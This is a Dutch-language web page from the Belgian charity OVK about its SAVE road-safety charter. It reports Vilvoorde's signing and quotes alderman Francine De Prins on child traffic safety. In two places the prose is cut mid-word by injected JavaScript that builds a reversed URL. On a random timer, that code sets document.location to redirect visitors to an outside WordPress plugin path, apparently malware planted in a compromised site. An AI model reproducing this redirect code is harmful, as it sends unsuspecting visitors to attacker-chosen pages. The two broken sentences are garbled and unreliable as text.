Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Vilvoorde ondertekent SAVE-charter

Vilvoorde ondertekende op 14 september als 7e in Vlaams Brabant en 56e in Vlaanderen het SAVE-charter.

De ondertekening van het SAVE-charter tijdens de week van de mobiliteit is voor de stad Vilvoorde geen begin, maar een logisch vervolg op de inspanningen om van Vilvoorde een kindvriendelijke stad te maken en een beter en veiliger mobiliteitsbeleid te voeren. Het aantal kinderen en jongeren in Vilvoorde is de laatste 10 jaar enorm gestegen: de stad heeft de meeste -20-jarigen van Vlaanderen. Vilvoorde beschikt daar bovenop ook over enkele humaniora-scholen waar ook heel wat jongeren uit de buurgemeentes naar toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe komen.

Het stadsbestuur beseft dat het geen evidentie is om al deze kinderen en jongeren met de fiets of het openbaar vervoer naar school te zien gaan, maar het drukke verkeer in Vilvoorde, zeker tijdens de spitsuren, maakt dat het voor de zwakke weggebruiker niet makkelijk is om zich veilig te verplaatsen.

“De stad blijft aan dit pijnpunt werken. Niet alleen door middel van infrastructuurwerken en nieuwe en betere fietspaden, maar ook door engagementen zoals de ondertekening van het SAVE-charter. Het blijft uiteraard niet bij de ondertekening vandaag. Morgen starten we met de opmaak van een actieplan om dit engagement ook daadwerkelijk uit te voeren. Want elk verkeersslachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffer is er één te veel!”, zegt schepen voor ruimtelijke ordening en mobiliteit Francine De Prins.

De stad krijgt een jaar lang begeleiding van OVK, om een actieplan verkeersveiligheid uit te werken. In dit actieplan worden de acties omschreven die de gemeente wil realiseren in het SAVE-jaar. Deze acties moeten aansluiten bij de zeven SAVE-doelstellingen.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be